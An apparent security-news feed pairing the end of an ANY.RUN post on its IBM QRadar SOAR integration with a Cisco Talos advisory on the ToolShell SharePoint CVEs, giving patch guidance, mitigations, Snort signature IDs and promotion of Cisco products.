  • Cost and Time Savings: Lower analyst workload by automating repetitive tasks, allowing focus on critical threats. 
  • Increased SOC Efficiency: Streamline triage, investigation, and escalation for Tier 1 and Tier 2 analysts with built-in automation and enriched data, reducing alert fatigue and manual steps. 
  • Enhanced Decision-Making and Process Improvement: Use detailed Sandbox reports and enriched data to create more effective rules, update response playbooks, and train detection models. 
  • Proactive Threat Management: Detect emerging threats earlier with fresh, behavior-based data from real-time malware analysis. TI Lookup and Sandbox insights help you uncover stealthy or multi-stage attacks that traditional tools may miss. 
  • Stronger ROI from Existing Tools: Maximize the value of your SOAR investment by extending its capabilities with behavioral analysis and contextual enrichment, no additional infrastructure required. 

How to Get Started 

Getting started with the ANY.RUN app in IBM QRadar SOAR takes just a few steps: 

1. Install the App from IBM App Exchange 

Simply find the official ANY.RUN app and install it in your SOAR environment; no coding or custom development needed. 

Install the ANY.RUN app from IBM App Exchange 

2. Connect Using Your ANY.RUN API Key 

In the integration settings, add your API key to connect your ANY.RUN account. You can choose to activate: 

  • TI Lookup only for real-time IOC enrichment 
  • Sandbox only for dynamic file and URL analysis 
  • Both modules together for full access to enrichment and behavioral analysis 

Both modules are available to paid ANY.RUN users and can be used independently or in combination, depending on your license. 

Add your API key to connect your ANY.RUN account 

3. Use or Customize the Playbooks 

Use the pre-configured playbooks that come with the integration or customize them to fit your SOC workflows. 

Pre-configured playbook example 

4. Automate Enrichment and Analysis in Your Incidents 

Once configured, you can begin automating threat investigation steps directly within IBM QRadar SOAR: 

  • Pull data from TI Lookup by sending artifacts (IPs, hashes, domains, etc.) and retrieving JSON-based enrichment with real-time threat intelligence 
  • Send files and URLs to Sandbox and receive key indicators, behavioral tags, verdicts, and detailed reports (PDF/JSON), all injected back into the incident 
Data pulled from ANY.RUN’s TI Lookup 

This lets your analysts make faster decisions, automate triage, and reduce response time without manual switching between tools. 

Integrate ANY.RUN with Other Solutions and Vendors 

ANY.RUN supports multiple integrations with popular security products. Check out the list to see how you can streamline workflows in your SOC.  

About ANY.RUN 

ANY.RUN is trusted by over 500,000 cybersecurity professionals and 15,000+ organizations in finance, healthcare, manufacturing, and beyond. Our services help security teams investigate threats faster and with greater confidence. 

Accelerate response times with our Interactive Sandbox: Analyze suspicious files in real time, uncover malicious behavior, and support quick decision-making. 

Enhance detection capabilities using Threat Intelligence Lookup and TI Feeds: Give your team the context they need to stay ahead of evolving cyber threats. 

Reach out to us for a 14-day trial of ANY.RUN’s service now → 

The post Turn Alert Noise into Threat Insights without Leaving QRadar SOAR with ANY.RUN  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

ToolShell: Details of CVEs Affecting SharePoint Servers

ToolShell: Details of CVEs Affecting SharePoint Servers

Cisco Talos is aware of the ongoing exploitation of CVE-2025-53770 and CVE-2025-53771 in the wild. These are path traversal vulnerabilities affecting SharePoint Server Subscription Edition, SharePoint Server 2016, and SharePoint Server 2019. According to Microsoft, these vulnerabilities do not affect SharePoint Online in Microsoft 365 and only apply to on-premises SharePoint servers.  

Microsoft has also released security updates and mitigation guidance for multiple affected products. At the time of this writing, no updated security patches are currently available for SharePoint Server 2016.  

These two vulnerabilities, CVE-2025-53770 / CVE-2025-573771, are related to CVE-2025-49704 and CVE-2025-49706, which were featured in the July Microsoft Patch Tuesday updates. The new updates that Microsoft has published provide more comprehensive protection against exploitation attempts targeting these vulnerabilities. In addition to installing the updates provided by Microsoft, they are also recommending users rotate the SharePoint Server ASP.NET machine keys to ensure data integrity. The Cybersecurity Infrastructure Security Agency (CISA) has also released additional details and technical indicators associated with ongoing exploitation attempts targeting unprotected SharePoint servers between July 18 – 19, 2025.  

Vulnerability details 

These are both unauthenticated remote code execution vulnerabilities related to CVE-2025-47904 and CVE-2025-49706. One of the key features of the previous vulnerabilities is that the user needed to be authenticated to obtain a valid signature by extracting the ValidationKey from memory or configuration. In the case of CVE-2025-53770 and CVE-2025-53771, attackers have managed to eliminate the need to be authenticated to obtain a valid signature, resulting in unauthenticated remote code execution. 

Patches have already been provided by Microsoft for most versions of SharePoint Server. However, as of the time of this publishing, SharePoint Server 2016 remains unpatched. As an alternative option, Microsoft has recommended that the Antimalware Scan Interface (AMSI) is turned on and configured correctly with the associated antivirus solution. 

Once patches are applied, Microsoft also recommends that users rotate their SharePoint Server ASP.NET machine keys in case the signing keys were compromised in the attack. This can be done both manually via Powershell and via Central Admin

Coverage 

As part of our coverage of the July Microsoft Patch Tuesday release on July 8, 2025, Talos previously published Snort SID 65092 to provide detection for exploitation attempts targeting CVE-2025-49704. We have investigated the new details provided by Microsoft as well as open-source information related to ongoing reports of exploitation activity targeting these vulnerabilities and have confirmed that the existing coverage remains effective at this time. Additionally Talos has published Snort SID 65183 to provide detection for the webshell being deployed in the current campaigns.  

Related existing BP Rules: 

Malicious Process Creation By Microsoft Exchange Server lIS triggers on creation of the webshell payload 

ToolShell: Details of CVEs Affecting SharePoint Servers

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Snort SIDs for this threat are 65092 (Vulnerability). 65183 (Webshell).  

Cisco Talos Blog – ​Read More